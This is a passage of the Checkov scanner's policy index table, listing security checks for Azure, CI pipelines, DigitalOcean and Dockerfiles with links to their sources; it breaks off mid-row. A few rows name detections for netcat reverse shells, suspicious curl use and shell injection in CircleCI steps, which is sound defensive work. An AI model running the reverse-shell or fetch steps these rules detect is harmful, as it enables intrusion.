2114 | CKV2_AZURE_22 | resource | azurerm_cognitive_account | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | +| 2115 | CKV2_AZURE_22 | resource | azurerm_cognitive_account_customer_managed_key | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | +| 2116 | CKV2_AZURE_23 | resource | Microsoft.AppPlatform/Spring | Ensure Azure spring cloud is configured with Virtual network (Vnet) | arm | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureSpringCloudConfigWithVnet.yaml) | +| 2117 | CKV2_AZURE_23 | resource | azurerm_spring_cloud_service | Ensure Azure spring cloud is configured with Virtual network (Vnet) | Terraform | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSpringCloudConfigWithVnet.yaml) | +| 2118 | CKV2_AZURE_24 | resource | azurerm_automation_account | Ensure Azure automation account does NOT have overly permissive network access | Terraform | [AzureAutomationAccNotOverlyPermissiveNetAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccNotOverlyPermissiveNetAccess.yaml) | +| 2119 | CKV2_AZURE_25 | resource | azurerm_mssql_database | Ensure Azure SQL database Transparent Data Encryption (TDE) is enabled | Terraform | [AzureSqlDbEnableTransparentDataEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSqlDbEnableTransparentDataEncryption.yaml) | +| 2120 | CKV2_AZURE_26 | resource | azurerm_postgresql_flexible_server_firewall_rule | Ensure Azure PostgreSQL Flexible server is not configured with overly permissive network access | Terraform | [AzurePostgreSQLFlexServerNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLFlexServerNotOverlyPermissive.yaml) | +| 2121 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | arm | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | +| 2122 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Bicep | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | +| 2123 | CKV2_AZURE_27 | resource | azurerm_mssql_server | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Terraform | [AzureConfigMSSQLwithAD.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureConfigMSSQLwithAD.yaml) | +| 2124 | CKV2_AZURE_28 | resource | azurerm_container_group | Ensure Container Instance is configured with managed identity | Terraform | [AzureContainerInstanceconfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureContainerInstanceconfigManagedIdentity.yaml) | +| 2125 | CKV2_AZURE_29 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Azure CNI networking enabled | Terraform | [AzureAKSclusterAzureCNIEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAKSclusterAzureCNIEnabled.yaml) | +| 2126 | CKV2_AZURE_30 | resource | azurerm_container_registry_webhook | Ensure Azure Container Registry (ACR) has HTTPS enabled for webhook | Terraform | [AzureACR_HTTPSwebhook.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureACR_HTTPSwebhook.yaml) | +| 2127 | CKV2_AZURE_31 | resource | azurerm_subnet | Ensure VNET subnet is configured with a Network Security Group (NSG) | Terraform | [AzureSubnetConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSubnetConfigWithNSG.yaml) | +| 2128 | CKV2_AZURE_32 | resource | azurerm_key_vault | Ensure private endpoint is configured to key vault | Terraform | [AzureKeyVaultConfigPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureKeyVaultConfigPrivateEndpoint.yaml) | +| 2129 | CKV2_AZURE_33 | resource | azurerm_storage_account | Ensure storage account is configured with private endpoint | Terraform | [AzureStorageAccConfigWithPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithPrivateEndpoint.yaml) | +| 2130 | CKV2_AZURE_34 | resource | azurerm_sql_firewall_rule | Ensure Azure SQL server firewall is not overly permissive | Terraform | [AzureSQLserverNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSQLserverNotOverlyPermissive.yaml) | +| 2131 | CKV2_AZURE_35 | resource | azurerm_recovery_services_vault | Ensure Azure recovery services vault is configured with managed identity | Terraform | [AzureRecoveryServicesvaultConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureRecoveryServicesvaultConfigManagedIdentity.yaml) | +| 2132 | CKV2_AZURE_36 | resource | azurerm_automation_account | Ensure Azure automation account is configured with managed identity | Terraform | [AzureAutomationAccConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccConfigManagedIdentity.yaml) | +| 2133 | CKV2_AZURE_37 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is using latest TLS (1.2) | Terraform | [AzureMariaDBserverUsingTLS_1_2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverUsingTLS_1_2.yaml) | +| 2134 | CKV2_AZURE_38 | resource | azurerm_storage_account | Ensure soft-delete is enabled on Azure storage account | Terraform | [AzureStorageAccountEnableSoftDelete.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountEnableSoftDelete.yaml) | +| 2135 | CKV2_AZURE_39 | resource | azurerm_linux_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 2136 | CKV2_AZURE_39 | resource | azurerm_network_interface | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 2137 | CKV2_AZURE_39 | resource | azurerm_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 2138 | CKV2_AZURE_39 | resource | azurerm_windows_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 2139 | CKV2_AZURE_40 | resource | azurerm_storage_account | Ensure storage account is not configured with Shared Key authorization | Terraform | [AzureStorageAccConfigSharedKeyAuth.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigSharedKeyAuth.yaml) | +| 2140 | CKV2_AZURE_41 | resource | azurerm_storage_account | Ensure storage account is configured with SAS expiration policy | Terraform | [AzureStorageAccConfig_SAS_expirePolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfig_SAS_expirePolicy.yaml) | +| 2141 | CKV2_AZURE_42 | resource | azurerm_postgresql_server | Ensure Azure PostgreSQL server is configured with private endpoint | Terraform | [AzurePostgreSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLserverConfigPrivEndpt.yaml) | +| 2142 | CKV2_AZURE_43 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is configured with private endpoint | Terraform | [AzureMariaDBserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverConfigPrivEndpt.yaml) | +| 2143 | CKV2_AZURE_44 | resource | azurerm_mysql_server | Ensure Azure MySQL server is configured with private endpoint | Terraform | [AzureMySQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMySQLserverConfigPrivEndpt.yaml) | +| 2144 | CKV2_AZURE_45 | resource | azurerm_mssql_server | Ensure Microsoft SQL server is configured with private endpoint | Terraform | [AzureMSSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLserverConfigPrivEndpt.yaml) | +| 2145 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_security_alert_policy | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | +| 2146 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_vulnerability_assessment | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | +| 2147 | CKV2_AZURE_47 | resource | azurerm_storage_account | Ensure storage account is configured without blob anonymous access | Terraform | [AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml) | +| 2148 | CKV2_AZURE_48 | resource | Microsoft.Databricks/workspaces | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | arm | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py) | +| 2149 | CKV2_AZURE_48 | resource | Microsoft.Databricks/workspaces | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | Bicep | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py) | +| 2150 | CKV2_AZURE_48 | resource | azurerm_databricks_workspace | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | Terraform | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml) | +| 2151 | CKV2_AZURE_49 | resource | Microsoft.MachineLearningServices/workspaces | Ensure that Azure Machine learning workspace is not configured with overly permissive network access | arm | [AzureMLWorkspacePublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml) | +| 2152 | CKV2_AZURE_49 | resource | azurerm_machine_learning_workspace | Ensure that Azure Machine learning workspace is not configured with overly permissive network access | Terraform | [AzureMLWorkspacePublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml) | +| 2153 | CKV2_AZURE_50 | resource | azurerm_machine_learning_workspace | Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible | Terraform | [AzureMLWorkspaceHBIPublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml) | +| 2154 | CKV2_AZURE_50 | resource | azurerm_storage_account | Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible | Terraform | [AzureMLWorkspaceHBIPublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml) | +| 2155 | CKV_AZUREPIPELINES_1 | azure_pipelines | jobs | Ensure container job uses a non latest version tag | Azure Pipelines | [ContainerLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerLatestTag.py) | +| 2156 | CKV_AZUREPIPELINES_1 | azure_pipelines | stages[].jobs[] | Ensure container job uses a non latest version tag | Azure Pipelines | [ContainerLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerLatestTag.py) | +| 2157 | CKV_AZUREPIPELINES_2 | azure_pipelines | jobs | Ensure container job uses a version digest | Azure Pipelines | [ContainerDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerDigest.py) | +| 2158 | CKV_AZUREPIPELINES_2 | azure_pipelines | stages[].jobs[] | Ensure container job uses a version digest | Azure Pipelines | [ContainerDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerDigest.py) | +| 2159 | CKV_AZUREPIPELINES_3 | azure_pipelines | jobs[].steps[] | Ensure set variable is not marked as a secret | Azure Pipelines | [SetSecretVariable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/SetSecretVariable.py) | +| 2160 | CKV_AZUREPIPELINES_3 | azure_pipelines | stages[].jobs[].steps[] | Ensure set variable is not marked as a secret | Azure Pipelines | [SetSecretVariable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/SetSecretVariable.py) | +| 2161 | CKV_AZUREPIPELINES_5 | azure_pipelines | *.container[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) | +| 2162 | CKV_AZUREPIPELINES_5 | azure_pipelines | jobs[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) | +| 2163 | CKV_AZUREPIPELINES_5 | azure_pipelines | stages[].jobs[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) | +| 2164 | CKV_BCW_1 | provider | bridgecrew | Ensure no hard coded API token exist in the provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/bridgecrew/credentials.py) | +| 2165 | CKV_BITBUCKET_1 | bitbucket_configuration | * | Merge requests should require at least 2 approvals | bitbucket_configuration | [merge_requests_approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket/checks/merge_requests_approvals.py) | +| 2166 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | [{image:image,__startline__:__startline__,__endline__:__endline__}] | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) | +| 2167 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | pipelines.*.[*][][][].step.{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) | +| 2168 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | pipelines.default[].step.{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) | +| 2169 | CKV_CIRCLECIPIPELINES_1 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag | circleci_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/latest_image.py) | +| 2170 | CKV_CIRCLECIPIPELINES_2 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image version is referenced via hash not arbitrary tag. | circleci_pipelines | [image_version_not_hash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/image_version_not_hash.py) | +| 2171 | CKV_CIRCLECIPIPELINES_3 | circleci_pipelines | orbs.{orbs: @} | Ensure mutable development orbs are not used. | circleci_pipelines | [prevent_development_orbs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/prevent_development_orbs.py) | +| 2172 | CKV_CIRCLECIPIPELINES_4 | circleci_pipelines | orbs.{orbs: @} | Ensure unversioned volatile orbs are not used. | circleci_pipelines | [prevent_volatile_orbs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/prevent_volatile_orbs.py) | +| 2173 | CKV_CIRCLECIPIPELINES_5 | circleci_pipelines | jobs.*.steps[] | Suspicious use of netcat with IP address | circleci_pipelines | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/ReverseShellNetcat.py) | +| 2174 | CKV_CIRCLECIPIPELINES_6 | circleci_pipelines | jobs.*.steps[] | Ensure run commands are not vulnerable to shell injection | circleci_pipelines | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/ShellInjection.py) | +| 2175 | CKV_CIRCLECIPIPELINES_7 | circleci_pipelines | jobs.*.steps[] | Suspicious use of curl in run task | circleci_pipelines | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/SuspectCurlInScript.py) | +| 2176 | CKV_CIRCLECIPIPELINES_8 | circleci_pipelines | executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Detecting image usages in circleci pipelines | circleci_pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/DetectImagesUsage.py) | +| 2177 | CKV_CIRCLECIPIPELINES_8 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Detecting image usages in circleci pipelines | circleci_pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/DetectImagesUsage.py) | +| 2178 | CKV_DIO_1 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket has versioning enabled | Terraform | [SpacesBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketVersioning.py) | +| 2179 | CKV_DIO_2 | resource | digitalocean_droplet | Ensure the droplet specifies an SSH key | Terraform | [DropletSSHKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/DropletSSHKeys.py) | +| 2180 | CKV_DIO_3 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket is private | Terraform | [SpacesBucketPublicRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketPublicRead.py) | +| 2181 | CKV_DIO_4 | resource | digitalocean_firewall | Ensure the firewall ingress is not wide open | Terraform | [FirewallIngressOpen.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/FirewallIngressOpen.py) | +| 2182 | CKV_DOCKER_1 | dockerfile | EXPOSE | Ensure port 22 is not exposed | dockerfile | [ExposePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/ExposePort22.py) | +| 2183 | CKV_DOCKER_2 | dockerfile | * | Ensure that HEALTHCHECK instructions have been added to container images | dockerfile | [HealthcheckExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/HealthcheckExists.py) | +| 2184 | CKV_DOCKER_3 | dockerfile | * | Ensure that a user for the container has been created | dockerfile | [UserExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/UserExists.py) | +| 2185 | CKV_DOCKER_4 | dockerfile | ADD | Ensure that COPY is used instead of ADD in Dockerfiles | dockerfile | [AddExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/AddExists.py) | +| 2186 | CKV_DOCKER_5 | dockerfile | RUN | Ensure update instructions are not use alone in the Dockerfile | dockerfile | [UpdateNotAlone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/UpdateNotAlone.py) | +| 2187 | CKV_DOCKER_6 | dockerfile | MAINTAINER | Ensure that LABEL maintainer is used instead of MAINTAINER (deprecated) | dockerfile | [MaintainerExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/MaintainerExists.py) | +| 2188 | CKV_DOCKER_7 | dockerfile | FROM | Ensure the base image uses a non latest version tag | dockerfile | [ReferenceLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/ReferenceLatestTag.py) | +| 2189 | CKV_DOCKER_8 | dockerfile | USER | Ensure the last USER is not root | dockerfile | [RootUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/RootUser.py) | +| 2190 | CKV_DOCKER_9 | dockerfile | RUN | Ensure that APT isn't used | dockerfile | [RunUsingAPT.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/RunUsingAPT.py) | +| 2191 | CKV_DOCKER_10 | dockerfile | WORKDIR | Ensure that WORKDIR values are absolute paths | dockerfile | [WorkdirIsAbsolute.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/WorkdirIsAbsolute.py) | +| 2192 | CKV_DOCKER_11 | dockerfile | FROM | Ensure From Alias are unique for multistage builds. | dockerfile | [AliasIsUnique.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/AliasIsUnique.py) | +| 2193 | CKV2_DOCKER_1 | resource | RUN | Ensure that sudo isn't used | dockerfile | [RunUsingSudo.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUsingSudo.yaml) | +| 2194 | CKV2_DOCKER_2 | resource | RUN | Ensure that certificate validation isn't disabled with curl | dockerfile | [RunUnsafeCurl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUnsafeCurl.yaml) | +| 2195 | CKV2_DOCKER_3 | resource | RUN | Ensure that certificate validation isn't disabled with wget | dockerfile | [RunUnsafeWget.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUnsafeWget.yaml) | +| 2196 | CKV2_DOCKER_4 | resource | RUN | Ensure that certificate validation isn't disabled with the pip '--trusted-host' option | dockerfile | [RunPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunPipTrustedHost.yaml) | +| 2197 | CKV2_DOCKER_5 | resource | ARG | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) | +| 2198 | CKV2_DOCKER_5 | resource | ENV | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) | +| 2199 | CKV2_DOCKER_5 | resource | RUN | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) | +| 2200 | CKV2_DOCKER_6 | resource | ARG | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) | +| 2201 | CKV2_DOCKER_6 | resource | ENV | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) | +| 2202 | CKV2_DOCKER_6 | resource | RUN | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) | +| 2203 | CKV2_DOCKER_7 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option | dockerfile | [RunApkAllowUntrusted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunApkAllowUntrusted.yaml) | +| 2204 | CKV2_DOCKER_8 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option | dockerfile | [RunAptGetAllowUnauthenticated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunAptGetAllowUnauthenticated.yaml) | +| 2205 | CKV2_DOCKER_9 | resource | RUN | Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option | dockerfile | [RunYumNoGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunYumNoGpgCheck.yaml) | +| 2206 | CKV2_DOCKER_10 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options | dockerfile | [RunRpmNoSignature.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunRpmNoSignature.yaml) | +| 2207 | CKV2_DOCKER_11 | resource | RUN | Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | dockerfile | [RunAptGetForceYes.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunAptGetForceYes.yaml) | +| 2208 | CKV2_DOCKER_12 | resource | ARG | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) | +| 2209 | CKV2_DOCKER_12 | resource | ENV | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) | +| 2210 | CKV2_DOCKER_12 | resource | RUN | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) | +| 2211 | CKV2_DOCKER_13 | resource | RUN | Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false | dockerfile | [RunNpmConfigSetStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunNpmConfigSetStrictSsl.yaml) | +| 2212 | CKV2_DOCKER_14 | resource | ARG | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) | +| 2213 | CKV2_DOCKER_14 | resource | ENV | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) | +| 2214 | CKV2_DOCKER_14 | resource | RUN | Ensure that certificate validation isn't disabled for git by setting the environment variable 